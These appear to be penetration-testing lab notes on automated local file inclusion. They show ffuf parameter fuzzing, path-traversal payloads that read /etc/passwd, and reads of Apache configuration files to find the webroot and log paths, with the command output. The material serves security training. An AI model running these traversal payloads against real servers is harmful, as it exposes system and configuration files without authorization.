FUZZING FOR LFI PAYLOADS (AUTOMATED)
#walk the application
root@oco:~$ BROWSER > http://83.136.249.42:34148/
* nothing significant found, as the page contains no links worth following up on
#scan for exposed parameter
root@oco:~$ find / -iname burp-* 2>/dev/null
/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt .
root@oco:~$ ffuf -w burp-parameter-names.txt:FUZZ -u 'http://94.237.54.42:56854/index.php?FUZZ=value' -fs 2287
xjxevt [Status: 200, Size: 2309, Words: 571, Lines: 56, Duration: 77ms]
xjxmthd [Status: 200, Size: 2309, Words: 571, Lines: 56, Duration: 77ms]
xjxfun [Status: 200, Size: 2309, Words: 571, Lines: 56, Duration: 77ms]
...
* filter out "2309" (every candidate parameter returns this size, so it is the default response; only parameters that change the page remain)
root@oco:~$ ffuf -w burp-parameter-names.txt:FUZZ -u 'http://94.237.54.42:56854/index.php?FUZZ=value' -fs 2309
view [Status: 200, Size: 1935, Words: 515, Lines: 56, Duration: 77ms]
#expand scanning via LFI-Jhaddix.txt
root@oco:~$ find / -iname LFI-Jhaddix.txt 2>/dev/null
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
root@oco:~$ cp /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt .
root@oco:~$ ffuf -w LFI-Jhaddix.txt:FUZZ -u 'http://94.237.54.42:56854/index.php?view=FUZZ' -fs 2287
/var/lp/logs/lpNet [Status: 200, Size: 1935, Words: 515, Lines: 56, Duration: 78ms]
/var/run/httpd.pid [Status: 200, Size: 1935, Words: 515, Lines: 56, Duration: 78ms]
/var/lp/logs/requests [Status: 200, Size: 1935, Words: 515, Lines: 56, Duration: 80ms]
/var/mysql.log [Status: 200, Size: 1935, Words: 515, Lines: 56, Duration: 80ms]
* LFI-Jhaddix.txt is a good wordlist because it contains various filter bypasses as well as commonly targeted files
- filter out 1935 (the size returned for payloads that did not include anything, so only successful inclusions remain)
root@oco:~$ ffuf -w LFI-Jhaddix.txt:FUZZ -u 'http://94.237.54.42:56854/index.php?view=FUZZ' -fs 1935
../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]
../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]
../../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]
../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]
../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]
../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]
#manually test the identified payloads from LFI-Jhaddix.txt to verify that they work as expected and show the included file content
root@oco:~$ BROWSER > {targetSite:port}/index.php?view=../../../../../../../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nolog
The server files that are most helpful in LFI exploitation are: the server webroot path, the server configuration files and the server logs. Knowing where such files exist and whether they can be read will assist further LFI exploitation.
This method is used when an uploaded file has to be located through an absolute path rather than a relative one.
#identify the webroot path
root@thm:~$ ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
/var/www/html/ [Status: 200, Size: 0, Words: 1, Lines: 1]
* depending on the LFI situation, it may be necessary to add a few more "../" segments before FUZZ
Server configuration files tend to contain the webroot and other important information.
#identify server logs/configuration locations
root@oco:~$ wget https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux
root@oco:~$ ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?{language}=../../../../FUZZ' -fs 2287
/etc/hosts [Status: 200, Size: 2461, Words: 636, Lines: 72]
/etc/hostname [Status: 200, Size: 2300, Words: 634, Lines: 66]
/etc/login.defs [Status: 200, Size: 12837, Words: 2271, Lines: 406]
/etc/fstab [Status: 200, Size: 2324, Words: 639, Lines: 66]
/etc/apache2/apache2.conf [Status: 200, Size: 9511, Words: 1575, Lines: 292]
/etc/issue.net [Status: 200, Size: 2306, Words: 636, Lines: 66]
...SNIP...
/etc/apache2/mods-enabled/status.conf [Status: 200, Size: 3036, Words: 715, Lines: 94]
/etc/apache2/mods-enabled/alias.conf [Status: 200, Size: 3130, Words: 748, Lines: 89]
/etc/apache2/envvars [Status: 200, Size: 4069, Words: 823, Lines: 112]
/etc/adduser.conf [Status: 200, Size: 5315, Words: 1035, Lines: 153]
* again, depending on the LFI situation, it may be necessary to add a few more "../" segments before FUZZ
#read the configuration file to determine webroot path and the log path
root@oco:~$ curl http://<SERVER_IP>:<PORT>/index.php?{language}=../../../../etc/apache2/apache2.conf
...SNIP...
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
...SNIP...
* the exact value of APACHE_LOG_DIR is defined in /etc/apache2/envvars
root@oco:~$ curl http://<SERVER_IP>:<PORT>/index.php?{language}=../../../../etc/apache2/envvars
...SNIP...
export APACHE_RUN_USER=www-data
export APACHE_RUN_GROUP=www-data
# temporary state file location. This might be changed to /run in Wheezy+1
export APACHE_PID_FILE=/var/run/apache2$SUFFIX/apache2.pid
export APACHE_RUN_DIR=/var/run/apache2$SUFFIX
export APACHE_LOCK_DIR=/var/lock/apache2$SUFFIX
# Only /var/log/apache2 is handled by /etc/logrotate.d/apache2.
export APACHE_LOG_DIR=/var/log/apache2$SUFFIX
...SNIP...